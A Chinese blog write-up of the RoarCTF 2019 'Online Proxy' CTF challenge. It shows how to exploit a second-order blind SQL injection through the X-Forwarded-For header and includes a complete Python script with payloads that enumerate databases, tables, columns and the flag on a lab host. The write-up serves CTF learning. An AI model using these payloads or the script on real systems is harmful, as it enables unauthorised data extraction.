[RoarCTF 2019]Online Proxy(x-forwarded-for盲注)

最新推荐文章于 2024-05-11 22:05:45 发布
最新推荐文章于 2024-05-11 22:05:45 发布
阅读量608 收藏
点赞数
分类专栏: sql注入 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/128570447
版权

这道题点开题目

然后题目显示不出网,一开始误认为是ssrf了,但是没有更多的信息了。 

源码有一个ip会不会是修改X-Forwarded-For就可以了呢,抓包试一下, 

发现有两个ip,一个当前一个是last上一个的意思把,这个本地是我火狐插件默认的。

然后这里因为我经验少没感觉,看了大佬的讲解,才突然悟了,这一眼就可以看出一个sql注入的问题,因为last肯定存储到了一个数据库的里面不然查询10.244.80.206怎么能显示出来呢。

经验不足,然后这下子才想到了二次注入,因为一开始是直接存了进去而后来如果我们在输入10.244.不就会在数据库查询有没有存在,没有的话才存数据库里面吗,所以思路来了如果存入危险sql然后第二次查找就会进行回显。

这里我一开始用的命令是

0' or ascii(substr((select database()),1,1)) > 1 #

但是返回的还是本身,然后换成了 '0把后面的引号闭合掉就可以了,这里想了一下会不会是存入数据库value ( #)会把括号闭合掉,或者过滤都有可能。

 

 9上传两次就可以显现,因为第一次是存入数据库,第二次是查找

麻烦的就是呃呃不在当前数据库

import requests


url = "http://node4.buuoj.cn:28823/"

#这个head头好像必须加cookie
head ={
    "X-Forwarded-For":"",
    "Cookie" : "track_uuid=ce631f2b-5cab-4c99-a795-40e01e157888"
}

# #查库名
# payload = "0' or ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{},1))>{} or '0"

# #查表名
# payload = "0' or ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='F4l9_D4t4B45e')),{},1))>{} or '0"

# #查列名
# payload = "0' or ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F4l9_t4b1e')),{},1))>{} or '0"

#查flag
payload = "0' or ascii(substr((select(group_concat(F4l9_C01uMn))from(F4l9_D4t4B45e.F4l9_t4b1e)),{},1))>{} or '0"

flag =""

for i in range(1,1000):
    low = 32
    high =137
    mid = (low+high)//2

    while(low < high):
        print(i,mid)
        '''插入sql语句'''
        payload1 = payload.format(i,mid)
        head["X-Forwarded-For"] = payload1
        print(head["X-Forwarded-For"])
        r = requests.get(url,headers=head)

        '''重新发送两次请求'''
        head["X-Forwarded-For"]= "penson"
        r = requests.get(url,headers=head)
        r = requests.get(url,headers=head)

        if "Last Ip: 1 " in r.text:
            low = mid+1
        else:
            high = mid

        mid =(low+high)//2


    if(mid ==32 or mid ==127):
        break
    flag +=chr(mid)
    print(flag)

print(flag)

 难点:

其实我想了很久在这里,为什么不能直接自己查自己注入的这条命令,然后点了半天都没有变化,这时候突然想了起来,他是查询 当前命令之前存入数据库中的,所以是查不到的,我的脚本自己注入了person这里是为了当前才能获得之前也就是注入点的回显。

 

 

 收获:

存在存入的功能,并且后续可以查询到,基本就有数据库,就可以联想到注入了。

偶尔躲躲乌云334
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[RoarCTF 2019]Online Proxy
m0_63045593的博客
04-22 1900
[RoarCTF 2019]Online Proxy <!-- Debug Info: Duration: 0.40283489227295 s Current Ip: 10.244.80.46 --> 看到ip联系一下 xff(识别ip的)可以自己修改 新知识点 一看到current IP和last IP,就应该想到,应该是把我们的IP给写到数据库里了。 跟SQL有关 挨个测试为单引号闭合 执行原理 数据在写入数据库时 1.127.0.0.1‘or’1在写入时为 Current
X-Forwarded-For Nginx 文档整理
01-18
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header Host $http_host; proxy_set_header X-NginX-Proxy true; proxy_pass http://127.0.0.1:9009/; proxy_redirect off; } ``` ...
X-Forwarded-For火狐插件
01-10
X-Forwarded-For火狐插件
攻防世界-xff_referer
最新发布
MateSnake的博客
05-11 330
攻防世界-xff_referer
[RoarCTF 2019]Online Proxy——二次入,又是你?
Mrs_H的博客
10-30 943
前言 最近真属于是”多事之秋“了,平常不留作业的课最近都破天荒的留了作业。最近做题目的节奏又被打乱了,哎无语。之后想写一篇关于flask的文章,不知道什么时候才有机会,现在还是以sql入为主。不说了,先看题吧。 正文 这道题又是二次入的题目,但是入点较之前的入点位有很大的不同。这次的入点在数据包头的XFF字段。 那么如何进行二次入呢?请考虑如下代码 select '0'+(length(database())>0)+'0' from user 如果我们将上面的查询语句提前插入了数据库中,
[RoarCTF 2019]Online Proxy --不会编程的崽
不会编程的崽的博客
03-29 828
sql
ACSG_v12.0.23以上版本_代理上网支持X-forwarded-For_X-forwarded-By功能说明.pdf
09-24
代理上网支持X-forwarded-For和X-forwarded-By功能说明 本文档旨在为ACSG v12.0.23以上版本的代理上网功能提供详细的功能说明,着重于X-forwarded-For和X-forwarded-By两个关键功能的使用和配置。 一、介绍 代理...
X-Forwarded-For详细介绍PDF
01-18
例如,"X-Forwarded-For: client1, proxy1, proxy2" 这样的格式表明client1是客户端的IP,proxy1和proxy2分别是两个代理服务器的IP。 XFF的主要作用在于: 1. **识别客户端IP**:在多层代理环境中,服务端无法直接...
proxy-addr:确定代理请求的地址
02-03
使用完成 : $ npm install proxy-addrAPI var proxyaddr = require ( 'proxy-addr' )proxyaddr(要求,信任) 使用给定的trust参数返回请求的地址。 trust参数是一个函数,如果您信任地址,则返回true否则,返回...
X-Forwarded-For Header-crx插件
04-02
语言:English (United States) 此扩展名使您可以快速设置X-Forwarded-For HTTP标头 此扩展允许您快速更新X-Forwarded-For,X-Originating-IP,X-Remote-IP和X-Remote-Addr HTTP标头,以进行各种测试。 变更日志:v0.6.2-修复了干扰此扩展的Firefox版本的错误v0.6.1-修复了CORS预检请求的问题v0.6.0-允许多个IP地址(以空格和/或逗号分隔),并包括次要的UI修复v0.5.0-添加了X-Originating-IP,X-Remote-IP和X-Remote-Addr作为标题选项。 新增了IPv6功能
x-proxy-v1.2.5-rc1-hdd.zip
04-22
x-proxy-v1.2.5-rc1-hdd.zip rc1-hdd rc1-hdd rc1-hdd
BUUCTF--[RoarCTF 2019]Online Proxy
qq_46263951的博客
07-19 293
这里发现通过修改X-FORWARDED-FOR的值释部分的内容也随之改变 尝试,上传命令时第一次为Current Ip发现并不能执行,再次上传Current Ip时上次的Current Ip变为Last Ip也没有执行,再次send即可正常执行命令 简单尝试使用得到所有库名,这里可以看到该方法是没问题的 ...
Proxy Online
weixin_30527143的博客
12-14 710
http://freenuts.com/top-10-free-online-proxy-websites/ aniscartujo.com browse007.com enoughschool.com hidemy.biz nobodycanstop.us polysolve.com schoolisgood.com sslunblock.com www.dtunnel.c...
X-Forwarded-For的神奇使用方法
分享博主日常学习和使用的一些技术
03-21 614
不知道为什么,有些网站是单纯的通过X-Forwarded-For进行ip校验的,这个是就可以对每个请求增加X-Forwarded-For以及对应的ip,从而绕过ip限制机制。可能是直接从tcp流中获取ip的,这样的话就很难了。
XXF(x-forwarded-for)
sleepywin的博客
07-15 3019
X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。TCP/IP层面的IP伪造很难实现,因为更改后很难实现正常的TCP通信,但在HTTP层面的伪造就显得很容易。,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。左边第一个是浏览器IP,依次往右为第一个代理服务器IP,第二个,第三个(使用逗号+空格进行分割)
几个在线的web代理
weixin_34186128的博客
08-14 769
http://www.cemsg.com/web/ http://pooling.info http://proxyol.com http://www.haozs.net/Proxyonline.htm http://web.proxycn.com/
nginx X-Forwarded-For
07-28
Nginx中的X-Forwarded-For是一个HTTP请求头,它用于指示原始客户端的IP地址。当请求通过代理服务器或负载均衡器时,X-Forwarded-For头可以帮助服务器获取真实的客户端IP地址。 在Nginx配置中,可以使用proxy_set_header指令来设置X-Forwarded-For头。例如,可以使用以下配置将客户端的IP地址设置为X-Forwarded-For头的值: ``` location / { proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_pass http://backend; } ``` 在这个例子中,$proxy_add_x_forwarded_for变量将会包含原始客户端的IP地址,并将其设置为X-Forwarded-For头的值。这样,后端服务器就可以通过读取X-Forwarded-For头来获取真实的客户端IP地址。 需要意的是,X-Forwarded-For头的值可以被伪造,因此在使用该值进行身份验证或安全相关的操作时需要谨慎处理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值